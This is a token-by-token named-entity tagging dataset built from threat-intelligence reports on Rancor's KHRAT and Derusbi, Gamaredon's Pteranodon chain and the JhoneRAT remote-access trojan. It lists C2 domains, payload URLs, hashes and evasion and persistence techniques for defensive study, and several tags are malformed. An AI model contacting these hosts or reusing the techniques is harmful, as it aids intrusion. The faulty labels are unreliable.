window O
with O
a O
caption O
of O
Hello O
Google O
! O

. O

This O
check O
is O
performed O
to O
ensure O
that O
only O
one O
instance O
of O
the O
malware O
is O
running O
at O
a O
time O
. O

The O
hidden O
window O
created O
by O
the O
malware O
filters O
on O
any O
user O
input O
( O
e.g O
. O
keyboard O
or O
mouse O
activity O
) O
. O

This O
could O
be O
an O
attempt O
to O
evade O
sandbox O
analysis O
as O
mouse O
and O
keyboard O
movement O
is O
typically O
not O
performed O
. O

The O
malware O
then O
proceeds O
to O
beacon O
to O
a O
configured O
remote O
server O
of O
cswksfwq.kfesv.xyz S-DOM
on O
TCP S-PROT
port O
8080 O
. O

Upon O
successful O
connection O
, O
the O
malware O
transmits O
victim O
information O
such O
as O
: O
hostname O
, O
IP O
address O
, O
Language O
Pack O
along O
with O
other O
operating O
system O
information O
. O

The O
data O
transmitted O
are O
XOR S-ENCR
encoded O
. O

The O
malware O
supports O
the O
following O
capabilities O
: O
Terminate O
specific O
process、Enumerate O
processes、Upload O
file、Download O
file、Delete O
file、List O
folder O
contents、Enumerate O
storage O
volumes、Execute O
a O
command、Reverse O
shell、Take O
a O
screenshot O
. O

KHRAT S-MAL
: O
SHA256 S-ENCR
: O
aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d380 S-SHA2
. O

KHRAT S-MAL
: O
Compile O
Date O
and O
Time O
: O
2018-05-02 B-TIME
05:22:23 I-TIME
PM E-TIME
. O

KHRAT S-MAL
: O
File O
Type O
: O
PE32 O
executable O
( O
DLL S-TOOL
) O
Intel O
80386, O
for O
MS B-OS
Windows E-OS
. O

KHRAT S-MAL
: O
File O
Name O
: O
8081.dll S-FILE
. O

Rmcmd O
: O

When O
the O
DLL S-TOOL
is O
initially O
loaded O
, O
it O
dynamically O
resolves O
and O
imports O
additional O
modules O
( O
DLLs S-TOOL
’ O
) O
needed O
. O

Once O
loaded O
and O
the O
export O
entry O
of O
Rmcmd O
is O
called O
, O
it O
creates O
a O
Windows B-TOOL S-OS I-TOOL
mutex E-TOOL
named O
gkdflbmdfk S-TOOL
. O

This O
ensures O
that O
only O
one O
copy O
of O
the O
malware O
is O
running O
at O
a O
time O
. O

It O
then O
begins O
to O
beacon O
to O
a O
configured O
domain O
of O
connect.bafunpda.xyz S-DOM
on O
TCP S-PROT
port O
8081 O
. O

The O
malware O
collects O
and O
transmits O
data O
from O
the O
host O
, O
such O
as O
hostname O
and O
is O
XOR S-ENCR
encoded O
with O
the O
first O
byte O
of O
the O
network O
traffic O
being O
the O
key O
. O

Reverse B-TOOL
Shell E-TOOL
: O

The O
malware O
behavior O
and O
code O
share O
similarities O
with O
an O
older O
KHRAT S-MAL
sample O
from O
May B-TIME
2018 E-TIME
. O

Sample O
( O
SHA256 S-ENCR
: O
bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659 S-SHA2
) O
has O
the O
same O
export O
entry O
name O
and O
is O
also O
a O
reverse B-TOOL
shell E-TOOL
. O

The O
newer O
sample O
appears O
to O
be O
a O
re-write O
for O
optimization O
purposes O
with O
the O
underlying O
behavior O
remaining O
the O
same O
, O
reverse B-TOOL
shell E-TOOL
. O

Derusbi S-MAL
: O
SHA256 S-ENCR
: O
83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2ab S-SHA2
. O

Derusbi S-MAL
: O
Compile O
Date O
and O
Time O
: O
2012-09-14 B-TIME
09:20:12 I-TIME
AM E-TIME
. O

Derusbi S-MAL
: O
File O
Type O
:P O
E32 O
executable O
( O
DLL S-TOOL
) O
Intel O
80386, O
for O
MS B-OS
Windows E-OS
. O

Derusbi S-MAL
: O
File O
Name O
: O
32.dll S-FILE
. O

Derusbi S-MAL
is O
a O
backdoor B-MAL S-MAL I-MAL
Trojan E-MAL S-MAL
believed O
to O
be O
used O
among O
a O
small O
group O
of O
attackers O
, O
which O
includes O
the O
Rancor S-APT
group O
. O

This O
particular O
sample O
is O
a O
loader O
that O
loads O
an O
encrypted O
payload O
for O
its O
functionality O
. O

This O
DLL S-TOOL
requires O
the O
loading O
executable O
to O
include O
a O
32-byte O
key O
on O
the O
command O
line O
to O
be O
able O
to O
decrypt O
the O
embedded O
payload O
, O
which O
unfortunately O
we O
do O
not O
have O
. O

Even O
though O
we O
don’t O
have O
the O
decryption O
key O
or O
loader O
, O
we O
have O
uncovered O
some O
interesting O
artifacts O
. O

If O
the O
module O
that O
loads O
the O
sample O
is O
named O
myapp.exe S-FILE
the O
module O
will O
exit O
Once O
loaded O
, O
it O
sleeps O
for O
six O
seconds O
. O

Looks O
for O
a O
Windows S-OS
pipe O
named O
\\.\pipe\_kernel32.dll.ntdll.dll.user32.dll S-FILE
. O

Looks O
for O
a O
Windows S-OS
device O
named O
\Device\acpi_010221 O
. O
n O
July B-TIME
2019 E-TIME
, O
we O
discovered O
an O
interesting O
VBScript S-TOOL
named O
Chrome.vbs S-FILE
( O
SHA256 S-ENCR
: O
0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2 S-SHA2
) O
associated O
with O
the O
Rancor S-APT
group O
. O

This O
particular O
VBScript S-TOOL
payload O
beacons O
to O
domain O
bafunpda.xyz S-DOM
, O
which O
is O
also O
used O
by O
the O
KHRAT S-MAL B-MAL
Trojan E-MAL S-MAL
listed O
above O
in O
Table O
2 O
. O

This O
VBScript S-TOOL
is O
obfuscated O
and O
contains O
packed O
data O
that O
is O
used O
to O
infect O
a O
target O
with O
multiple O
chained O
persistent O
artifacts O
. O

The O
MOF B-TOOL
file E-TOOL
created O
by O
the O
VBScript S-TOOL
is O
used O
as O
a O
persistence O
mechanism O
via O
Windows B-TOOL S-OS I-TOOL
Management I-TOOL
Instrumentation E-TOOL
( O
WMI S-TOOL
) O
Event O
Subscriptions O
. O

MOF B-TOOL
files E-TOOL
are O
compiled O
scripts O
that O
describe O
Common B-TOOL
Information I-TOOL
Model E-TOOL
( O
CIM S-TOOL
) O
classes O
, O
which O
are O
compiled O
into O
the O
WMI S-TOOL
repository O
. O

The O
technique O
is O
described O
by O
MITRE S-SECTEAM B-TOOL
ATT&CK I-TOOL
IDT1084 E-TOOL
. O

This O
particular O
MOF B-TOOL
file E-TOOL
creates O
a O
timer O
event O
that O
is O
triggered O
every O
five O
seconds O
. O

The O
DLL S-TOOL
located O
in O
the O
Media B-TOOL
registry E-TOOL
key O
is O
a O
variant O
of O
the O
KHRAT B-MAL
Troja S-MALn E-MAL S-MAL
. O

It O
beacons O
to O
domain O
connect.bafunpda.xyz S-DOM
and O
attempts O
to O
connect O
to O
TCP S-PROT
port O
4433 O
. O

This O
is O
the O
same O
domain O
used O
by O
the O
KHRAT S-MAL B-MAL
Trojan E-MAL S-MAL
. O

Rancor S-APT
, O
a O
cyber O
espionage O
group O
active O
since O
at B-TIME
least I-TIME
2017 E-TIME
, O
continues O
to O
conduct O
targeted O
attacks O
in O
Southeast B-LOC
Asia E-LOC S-LOC
and O
has O
been O
found O
using O
an O
undocumented O
, O
custom O
malware O
family O
– O
which O
we O
’ve O
dubbed O
Dudell S-MAL
– O
to O
download O
a O
second O
stage O
payload O
once O
its O
malicious O
macro O
is O
executed O
. O

Additionally O
, O
Rancor S-APT
is O
also O
using O
the O
Derusbi S-MAL
malware O
family O
to O
load O
a O
secondary O
payload O
once O
it O
infiltrates O
a O
target O
. O

Rancor S-APT
: O
0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 S-SHA2
. O

Rancor S-APT
: O
AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609 S-SHA2
. O

Rancor S-APT
: O
0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E S-SHA2
. O

Rancor S-APT
: O
DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E S-SHA2
. O

Rancor S-APT
: O
CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A S-SHA2
. O

Rancor S-APT
: O
BC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659 S-SHA2
. O

Rancor S-APT
: O
83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d S-SHA2
. O

Rancor S-APT
: O
cswksfwq.kfesv.xyz S-DOM
. O

Rancor S-APT
: O
Connect.bafunpda.xyz S-DOM
. O

Rancor S-APT
: O
199.247.6.253 S-IP
. O


Cyberwarfare O
: O
A O
deep O
dive O
into O
the O
latest O
Gamaredon S-APT
Espionage O
Campaign O
. O

Gamaredon S-APT
Group O
is O
a O
Cyber O
Espionage O
persistent O
operation O
attributed O
to O
Russians B-IDTY
FSB E-IDTY
( O
Federal B-IDTY
Security I-IDTY
Service E-IDTY
) O
in O
a O
long-term O
military O
and O
geo-political O
confrontation O
against O
the O
Ukrainian B-IDTY
government E-IDTY
and O
more O
in O
general O
against O
the O
Ukrainian O
military O
power O
. O

Gamaredon S-APT
has O
been O
active O
since O
2014 S-TIME
, O
and O
during O
this O
time O
, O
the O
modus O
operandi O
has O
remained O
almost O
the O
same O
. O

The O
most O
used O
malware O
implant O
is O
dubbed O
Pteranodon S-MAL
or O
Pterodo S-MAL
and O
consists O
of O
a O
multistage O
backdoor S-MAL
designed O
to O
collect O
sensitive O
information O
or O
maintaining O
access O
on O
compromised O
machines O
. O

It O
is O
distributed O
in O
a O
spear B-ACT
phishing I-ACT
campaign E-ACT
with O
a O
weaponized O
ofﬁce S-TOOL
document O
that O
appears O
to O
be O
designed O
to O
lure O
military O
personnel O
. O

In O
the O
recent O
months O
, O
Ukrainian B-SECTEAM
CERT E-SECTEAM
( O
CERT-UA S-SECTEAM
) O
reported O
an O
intensiﬁcation O
of O
Gamaredon B-ACT S-APT I-ACT
Cyberattacks E-ACT
against O
military O
targets O
. O

The O
new O
wave O
dates O
back O
to O
the O
end O
of O
November B-TIME
2019 E-TIME
and O
was O
ﬁrst O
analyzed O
by O
Vitali O
Kremez O
. O

Starting O
from O
those O
ﬁndings O
, O
Cybaze-Yoroi B-SECTEAM
ZLab I-SECTEAM
team E-SECTEAM
decided O
to O
deep O
dive O
into O
a O
technical O
analysis O
of O
the O
latest O
Pterodo S-MAL
implant O
. O

The O
complex O
infection O
chain O
begins O
with O
a O
weaponized O
Ofﬁce S-TOOL
document O
named O
“ O
f.doc S-FILE
” O
. O

Hash O
: O
76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a S-SHA2

Threat O
: O
Gamaredon S-APT
Pteranodon S-MAL
weaponized O
document O
. O

Brief O
Description O
: O
Doc O
ﬁle O
weaponized O
with O
Exploit O
. O

Ssdeep S-TOOL
: O
768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir O
: O
uG1aKQ5OwCrItq3TgGfLt9r O
. O

The O
decoy O
document O
is O
written O
using O
the O
ukrainian O
language O
mixed O
to O
many O
special O
chars O
aimed O
to O
lure O
the O
target O
to O
click O
on O
it O
. O

The O
document O
leverages O
the O
common O
exploit O
aka O
template O
injection O
and O
tries O
to O
download O
a O
second O
stage O
from O
“ O
http://win-apu.ddns.net/apu.dot S-IP
” O
. O

Thanks O
to O
this  O
exploit O
( O
Remote B-VULNAME
Code I-VULNAME
Execution E-VULNAME
exploit O
) O
the O
user O
interaction O
is O
not O
required O
, O
in O
fact O
the O
“ O
enable O
macro S-TOOL
” O
button O
is O
not O
shown O
. O

The O
downloaded O
document O
has O
a O
“ O
.dot S-FILE
” O
extension O
, O
used O
by O
Microsoft B-TOOL
Ofﬁce E-TOOL
to O
save O
templates O
for O
different O
documents O
with O
similar O
formats O
. O

Basic O
Information O
on O
the O
“ O
.dot S-FILE
” O
ﬁle O
are O
provided O
: O

Hash O
: O
e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 S-SHA2
. O

Threat O
: O
Gamaredon S-APT
Pteranodon S-MAL
loader O
dot O
ﬁle O
. O

Brief O
Description O
: O
Dot O
ﬁle O
enabling O
the O
infection O
of O
the O
Gamaredon S-APT
Pteranodon S-MAL
. O

Ssdeep S-TOOL
: O
768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ O
: O
oI8XoWruHpp/P4 O
. O

If O
we O
decide O
to O
open O
the O
document O
, O
we O
see O
that O
the O
document O
is O
empty O
, O
but O
it O
requires O
the O
enabling O
of O
the O
macro S-TOOL
. O

The O
body O
of O
the O
macro S-TOOL
can O
be O
logically O
divided O
into O
two O
distinct O
parts O
: O

The O
ﬁrst O
one O
is O
the O
setting O
of O
the O
registry O
key O
“ O
HKEY_CURRENT_USER\Software\Microsoft\Ofﬁce\ O
” O
& O
Application.Version O
& O
_ O
” O
\Word\Security\ O
” O
and O
the O
declaration O
of O
some O
other O
variables O
, O
such O
as O
the O
dropurl O
“ O
geticons.ddns.net O
” O
. O

The O
second O
one O
is O
the O
setting O
of O
the O
persistence O
mechanism O
through O
the O
writing O
of O
the O
vbs O
code O
in O
the O
Startup O
folder O
with O
name O
“ O
templates.vbs S-FILE
” O
. O

This O
vbs O
is O
properly O
the O
macro O
executed O
by O
the O
macro O
engine O
of O
word O
. O

Analyzing O
the O
content O
of O
“ O
templates.vbs S-FILE
” O
it O
is O
possible O
to O
notice O
that O
it O
deﬁne O
a O
variable O
containing O
a O
URL O
like O
“ O
http://geticons.ddns.net/ADMIN-PC_E42CAF54//autoindex B-URL
. E-URL
]php O
” O
obtained O
from O
“ O
hxp://get-icons.ddns B-URL
. I-URL
]net/ I-URL
” I-URL
& I-URL
NlnQCJG I-URL
& I-URL
“ I-URL
_ I-URL
” I-URL
& I-URL
uRDEJCn I-URL
& I-URL
“ I-URL
//autoindex I-URL
. I-URL
]php E-URL
” O
, O
where O
“ O
NlnQCJG O
” O
is O
the O
name O
that O
identiﬁes O
the O
computer O
on O
the O
network O
and O
“ O
uRDEJCn O
” O
is O
the O
serial O
number O
of O
drive O
in O
hexadecimal O
encoding O
. O

From O
this O
URL O
it O
tries O
to O
download O
another O
stage O
then O
storing O
it O
into O
“ O
C:\Users\admin\AppData\Roaming\ O
” O
path O
with O
random O
name O
. O

At O
the O
end O
, O
“ O
templates.vbs S-FILE
” O
script O
will O
force O
the O
machine O
to O
reboot O
. O

The O
dropped O
sample O
is O
an O
SFX B-TOOL
archive E-TOOL
, O
like O
the O
tradition O
of O
Gamaredon S-APT
implants O
. O

Hash O
: O
c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f S-SHA2
. O

Threat O
: O
Gamaredon S-APT
Pteranodon S-MAL
implant O
SFX B-TOOL
archive E-TOOL
. O

Brief O
Description O
: O
SFX O
Archive O
First O
Stage O
. O

Ssdeep S-TOOL
: O
24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv O
: O
zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv O
. O

By O
simply O
opening O
the O
SFX B-TOOL
archive E-TOOL
, O
it O
is O
possible O
to O
notice O
two O
different O
ﬁles O
that O
are O
shown O
below O
and O
named O
respectively O
“ O
8957.cmd S-FILE
” O
and O
“ O
28847 S-FILE
” O
. O

When O
executed O
, O
the O
SFX B-TOOL
archive E-TOOL
will O
be O
extracted O
and O
the O
“ O
8957.cmd S-FILE
” O
will O
be O
run O
. O

At O
this O
point O
, O
the O
batch O
script O
renames O
the O
“ O
28847 S-FILE
” O
ﬁle O
in O
“ O
28847.exe S-FILE
” O
, O
opens O
it O
using O
“ O
pﬂjk O
,fkbcerbgblfhs O
” O
as O
password O
and O
the O
ﬁle O
contained O
inside O
the O
“ O
28847.exe S-FILE
” O
ﬁle O
will O
be O
renamed O
in O
“ O
WuaucltIC.exe S-FILE
” O
. O

Finally O
, O
it O
will O
be O
run O
using O
“ O
post.php S-FILE
” O
as O
argument O
. O

The O
fact O
that O
the O
“ O
28847.exe S-FILE
” O
ﬁle O
can O
be O
opened O
makes O
us O
understand O
that  O
the O
“ O
28847 S-FILE
” O
ﬁle O
is O
another O
SFX S-TOOL
ﬁle O
. O

Some O
static O
information O
about O
SFX S-TOOL
are O
: O

Hash O
: O
3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1 S-SHA2
. O

Threat O
: O
Gamaredon S-APT
Pteranodon S-MAL
implant O
SFX B-TOOL
archive E-TOOL
. O

Brief O
Description O
: O
SFX B-TOOL
Archive E-TOOL
Second O
Stage O
. O

Ssdeep S-TOOL
: O
24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM O
: O
OoZwxVvfoaPu O
. O

Exploring O
it O
, O
it O
is O
possible O
to O
see O
several O
ﬁles O
inside O
of O
it O
,  O
as O
well O
as O
the O
6323 S-FILE
ﬁle O
. O

In O
this O
case O
, O
the O
SFX B-FILE
archive E-FILE
contains O
8 O
ﬁles O
: O
ﬁve O
of O
them O
are O
legit O
DLLs S-TOOL
used O
by O
the O
“ O
6323 S-FILE
” O
executable O
to O
interoperate O
with O
the O
OLE S-TOOL
format O
deﬁned O
and O
used O
by O
Microsoft B-TOOL
Ofﬁce E-TOOL
. O

The O
“ O
ExcelMyMacros.txt S-FILE
” O
and O
“ O
wordMacros.txt S-FILE
” O
ﬁles O
contain O
further O
macro O
script O
, O
described O
next O
. O

So O
, O
static O
analysis O
on O
the O
“ O
6323 S-FILE
” O
ﬁle O
shown O
as O
its O
nature O
: O
it O
is O
written O
using O
Microsoft B-TOOL
Visual I-TOOL
Studio I-TOOL
.NET E-TOOL
, O
therefore O
easily O
to O
reverse O
. O

Before O
reversing O
the O
executable O
, O
it O
is O
possible O
to O
clean O
it O
allowing O
the O
size O
reduction O
and O
the O
junk O
instruction O
reduction O
inside O
the O
code O
. O

The O
below O
image O
shows O
the O
information O
about O
the O
sample O
before O
and O
after O
the O
cleaning O
. O

The O
ﬁrst O
check O
performed O
is O
on O
the O
arguments O
: O
if O
the O
arguments O
length O
is O
equal O
to O
zero O
, O
the O
malware O
terminates O
the O
execution O
. O

After O
that O
, O
the O
malware O
checks O
if O
the O
existence O
of O
the O
ﬁles O
“ O
ExcelMyMacros.txt S-FILE
” O
and O
“ O
wordMacros.txt S-FILE
” O
in O
the O
same O
path O
where O
it O
is O
executed O
: O
if O
true O
then O
it O
reads O
their O
contents O
otherwise O
it O
will O
exit O
. O

As O
visible O
in O
the O
previous O
ﬁgure O
, O
the O
only O
difference O
between O
the O
ﬁles O
are O
in O
the O
variable O
, O
registry O
key O
and O
path O
used O
by O
Word O
rather O
than O
by O
Excel S-TOOL
. O

Finally O
the O
macros S-TOOL
are O
executed O
using O
the O
Ofﬁce S-TOOL
engine O
. O

So O
let O
’s O
start O
to O
dissect O
the O
macros S-TOOL
. O

For O
a O
better O
comprehension O
we O
will O
be O
considering O
only O
one O
macro S-TOOL
and O
in O
the O
speciﬁc O
case O
we O
will O
analyze O
“ O
wordMacros.txt S-FILE
” O
  O
ones O
. O

First O
of O
all O
the O
macro S-TOOL
will O
set O
the O
registry O
key O
“ O
HKEY_CURRENT_USER\Software\Microsoft\Ofﬁce\ O
” O
& O
Application.Version O
& O
_ O
” O
\Word\Security\ O
” O
and O
then O
will O
set O
up O
two O
scheduled O
tasks O
that O
will O
start O
respectively O
every O
12 O
and O
15 O
minutes O
: O
the O
ﬁrst O
one O
will O
run O
a O
“ O
IndexOfﬁce.vbs S-FILE
” O
in O
the O
path O
“ O
%APPDATA%\Microsoft\Ofﬁce\ O
” O
and O
the O
second O
one O
will O
run O
“ O
IndexOfﬁce.exe S-FILE
” O
in O
the O
same O
path O
. O

Finally O
, O
the O
malware O
will O
write O
the O
“ O
IndexOfﬁce.txt S-FILE
” O
ﬁle O
in O
the  O
“ O
%APPDATA%\Microsoft\Ofﬁce\ O
” O
path O
. O

The O
script O
will O
check O
the O
presence O
of O
the  O
“ O
IndexOfﬁce.exe S-FILE
” O
artifact O
: O
if O
true O
then O
it O
will O
delete O
it O
and O
it O
will O
download O
a O
new O
ﬁle/script O
from O
“ O
http://masseffect.space/<PC_Name>_<Hex_Drive_SN>/post.php S-URL
” O
. O

The O
malware O
tries O
to O
save O
the O
C2 S-TOOL
response O
and O
encoding O
it O
using O
Encode O
function O
. O

This O
function O
accepts O
three O
parameters O
: O
the O
input O
ﬁle O
, O
the O
output O
ﬁle O
and O
the O
arrKey O
; O
arrKey O
is O
calculated O
thanks O
to  O
GetKey O
function O
that O
accepts O
as O
input O
the O
Hexadecimal O
value O
of O
the O
Driver B-TOOL
SN E-TOOL
installed O
on O
the O
machine O
and O
returns O
the O
key O
as O
results O
. O

Gamaredon S-APT
cyberwarfare O
operations O
against O
Ukraine S-LOC
are O
still O
active O
. O

This O
technical O
analysis O
reveals O
that O
the O
modus O
operandi O
of O
the O
Group O
has O
remained O
almost O
identical O
over O
the O
years O
. O

The O
massive O
use O
of O
weaponized O
Ofﬁce S-TOOL
documents O
, O
Ofﬁce S-TOOL B-ACT
template I-ACT
injection E-ACT
, O
sfx B-TOOL
archives E-TOOL
, O
wmi S-TOOL
and O
some O
VBA B-TOOL
macro I-TOOL
stages S-TOOL E-TOOL
that O
dinamically O
changes O
,  O
make O
the O
Pterodon S-MAL
attack O
chain O
very O
malleable O
and O
adaptive O
. O

However O
, O
the O
introduction O
of O
a O
.Net S-TOOL
component O
is O
a O
novelty O
compared O
to O
previous O
Pterodon S-MAL
samples O
. O

Gamaredon S-APT
: O
76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a S-SHA2
. O

Gamaredon S-APT
: O
e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 S-SHA2
. O

Gamaredon S-APT
: O
def13f94cdf793df3e9b42b168550a09ee906f07f61a3f5c9d25ceca44e8068c S-SHA2
. O

Gamaredon S-APT
: O
c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f S-SHA2
. O

Gamaredon S-APT
: O
86977a785f361d4f26eb3e189293c0e30871de3c93b19653c26a31dd4ed068cc S-SHA2
. O

Gamaredon S-APT
: O
http://win-apu.ddns.net/apu.dot/ S-URL
. O

Gamaredon S-APT
: O
http://get-icons.ddns.net/apu.dot/ S-URL
. O

Gamaredon S-APT
: O
http://masseffect.space/ S-URL
. O


JhoneRAT S-MAL
: O
Cloud O
based O
python S-TOOL
RAT S-TOOL
targeting O
Middle B-LOC
Eastern I-LOC
countries E-LOC
. O

Today O
, O
Cisco B-SECTEAM
Talos E-SECTEAM
is O
unveiling O
the O
details O
of O
a O
new O
RAT S-TOOL
we O
have O
identified O
we O
're O
calling O
" O
JhoneRAT S-MAL
" O
. O

This O
new O
RAT S-TOOL
is O
dropped O
to O
the O
victims O
via O
malicious O
Microsoft B-TOOL
Office B-IDTY I-TOOL E-IDTY
docume S-TOOLnts E-TOOL
. O

The O
dropper O
, O
along O
with O
the O
Python B-TOOL
RAT E-TOOL S-TOOL
, O
attempts O
to O
gather O
information O
on O
the O
victim O
's O
machine O
and O
then O
uses O
multiple O
cloud O
services O
: O
Google B-TOOL
Drive E-TOOL
, O
Twitter S-TOOL
, O
ImgBB S-TOOL
and O
Google B-TOOL
Forms E-TOOL
. O

The O
RAT S-TOOL
attempts O
to O
download O
additional O
payloads O
and O
upload O
the O
information O
gathered O
during O
the O
reconnaissance O
phase O
. O

This O
particular O
RAT S-TOOL
attempts O
to O
target O
a O
very O
specific O
set O
of O
Arabic-speaking O
countries O
. O

The O
filtering O
is O
performed O
by O
checking O
the O
keyboard O
layout O
of O
the O
infected O
systems O
. O

Based O
on O
the O
analysed O
sample O
, O
JhoneRAT S-MAL
targets O
Saudi B-LOC
Arabia E-LOC
, O
Iraq S-LOC
, O
Egypt S-LOC
, O
Libya S-LOC
, O
Algeria S-LOC
, O
Morocco S-LOC
, O
Tunisia S-LOC
, O
Oman S-LOC
, O
Yemen S-LOC
, O
Syria S-LOC
, O
UAE S-LOC
, O
Kuwait S-LOC
, O
Bahrain S-LOC
and O
Lebanon S-LOC
. O

The O
campaign O
shows O
an O
actor O
that O
developed O
a O
homemade O
RAT O
that O
works O
in O
multiple O
layers O
hosted O
on O
cloud O
providers O
. O

JhoneRAT S-MAL
is O
developed O
in O
python S-TOOL
but O
not O
based O
on O
public O
source O
code O
, O
as O
it O
is O
often O
the O
case O
for O
this O
type O
of O
malware O
. O

The O
attackers O
put O
great O
effort O
to O
carefully O
select O
the O
targets O
located O
in O
specific O
countries O
based O
on O
the O
victim O
's O
keyboard O
layout O
. O

Everything O
starts O
with O
a O
malicious O
document O
using O
a O
well-known O
vulnerability O
to O
download O
a O
malicious O
document O
hosted O
on O
the O
internet O
. O

For O
this O
campaign O
, O
the O
attacker O
chose O
to O
use O
a O
cloud O
provider O
( O
Google S-TOOL
) O
with O
a O
good O
reputation O
to O
avoid O
URL O
blacklisting O
. O

The O
malware O
is O
divided O
into O
a O
couple O
of O
layers O
— O
each O
layer O
downloads O
a O
new O
payload O
on O
a O
cloud O
provider O
to O
get O
the O
final O
RAT S-TOOL
developed O
in O
python S-TOOL
and O
that O
uses O
additional O
providers O
such O
as O
Twitter S-TOOL
and O
ImgBB S-TOOL
. O

This O
RAT S-TOOL
is O
a O
good O
example O
of O
how O
a O
highly O
focused O
attack O
that O
tries O
to O
blend O
its O
network O
traffic O
into O
the O
crowd O
can O
be O
highly O
effective O
. O

In O
this O
campaign O
, O
focusing O
detection O
of O
the O
network O
is O
not O
the O
best O
approach O
. O

Instead O
, O
the O
detection O
must O
be O
based O
on O
the O
behaviour O
on O
the O
operating O
system O
. O

Attackers O
can O
abuse O
well-known B-TOOL
cloud I-TOOL
providers E-TOOL
and O
abuse O
their O
reputations O
in O
order O
to O
avoid O
detection O
. O

The O
fact O
that O
this O
attacker O
decided O
to O
leverage O
cloud B-TOOL
services E-TOOL
and O
four B-TOOL
different I-TOOL
services E-TOOL
— O
and O
not O
their O
own O
infrastructure O
— O
is O
smart O
from O
an O
opsec O
point O
of O
view O
. O

It O
is O
hard O
for O
the O
targets O
to O
identify O
legitimate O
and O
malicious O
traffic O
to O
cloud O
provider O
infrastructure O
. O

Moreover O
, O
this O
kind O
of O
infrastructure O
uses O
HTTPS S-PROT
and O
the O
flow O
is O
encrypted O
that O
makes O
man-in-the-middle O
interception O
more O
complicated O
for O
the O
defender O
. O

It O
is O
not O
the O
first O
time O
an O
attacker O
used O
only O
cloud B-TOOL
providers E-TOOL
. O

Even O
while O
using O
these O
services O
, O
the O
authors O
of O
this O
JhoneRAT S-MAL
went O
further O
and O
used O
different O
user-agent O
strings O
depending O
on O
the O
request O
, O
and O
even O
on O
the O
downloaders O
the O
authors O
used O
other O
user-agent O
strings O
. O

We O
already O
published O
a O
couple O
of O
articles O
about O
ROKRAT S-MAL
( O
here O
, O
here O
, O
here O
and O
here O
) O
where O
another O
unrelated O
actor O
, O
Group123 S-APT
, O
made O
the O
same O
choice O
but O
with O
different O
providers O
. O

The O
attacker O
implemented O
filtering O
based O
on O
the O
keyboard O
's O
layout O
. O

The O
malware O
is O
executed O
only O
for O
the O
following O
layout O
, O
the O
country O
is O
based O
on O
the O
Microsoft S-IDTY
website O
: O

' O
0401 O
' O
: O
Saudi B-LOC
Arabia E-LOC
. O
' O
0801 O
' O
: O
Iraq S-LOC
. O
' O
0c01 O
' O
: O
Egypt S-LOC
. O
' O
1001 O
' O
: O
Libya S-LOC
. O
' O
1401 O
' O
: O
Algeria S-LOC
. O
' O
1801 O
' O
: O
Morocco S-LOC
. O
' O
1c01 O
' O
: O
Tunisia S-LOC
. O
' O
2001 O
' O
: O
Oman S-LOC
. O
' O
2401 O
' O
: O
Yemen S-LOC
. O
' O
2801 O
' O
: O
Syria S-LOC
. O
' O
3801 O
' O
: O
UAE S-LOC
. O
' O
3401 O
' O
: O
Kuwait S-LOC
. O
' O
3c01 O
' O
: O
Bahrain S-LOC
. O
' O
3001 O
' O
: O
Lebanon S-LOC
. O

We O
identified O
three O
malicious O
Microsoft B-TOOL
Office B-IDTY I-TOOL E-IDTY
documents E-TOOL
that O
download O
and O
load O
an O
additional O
Office O
document O
with O
a O
Macro S-TOOL
. O

The O
oldest O
one O
from O
November B-TIME
2019 E-TIME
, O
named O
" O
Urgent.docx S-FILE
" O
. O

The O
author O
of O
the O
document O
asks O
to O
enable O
editing O
in O
English O
and O
in O
Arabic O
. O

The O
second O
document O
from O
the O
beginning B-TIME
of I-TIME
January E-TIME
is O
named O
" O
fb.docx S-FILE
" O
and O
contains O
usernames O
and O
passwords O
from O
an O
alleged O
" O
Facebook S-TOOL
" O
leak O
. O

The O
more O
recent O
document O
is O
from O
mid-January S-TIME
and O
alleged O
to O
be O
from O
a O
United B-LOC
Arab I-LOC
Emirate E-LOC
organization O
. O

The O
author O
blurred O
the O
content O
and O
asks O
the O
user O
to O
enable O
editing O
to O
see O
the O
content O
. O

In O
the O
three O
documents O
, O
an O
additional O
Office B-TOOL
document E-TOOL
containing O
a O
Macro S-TOOL
is O
downloaded O
and O
executed O
. O

The O
documents O
are O
located O
on O
Google B-TOOL
Drive E-TOOL
. O

The O
template O
located O
on O
Google B-TOOL
Drive E-TOOL
contains O
a O
macro S-TOOL
. O

The O
macro O
contains O
a O
virtual O
machine O
detection O
technique O
based O
on O
the O
serial O
number O
of O
the O
disks O
available O
in O
the O
victim O
environment O
. O

Indeed O
, O
some O
VMs S-TOOL
do O
not O
have O
serial O
numbers O
and O
the O
macro O
is O
executed O
only O
if O
a O
serial O
number O
exists O
. O

A O
WMIC S-TOOL
command O
is O
executed O
to O
get O
this O
information O
on O
the O
targeted O
system O
. O

If O
a O
serial O
number O
exists O
, O
the O
rest O
of O
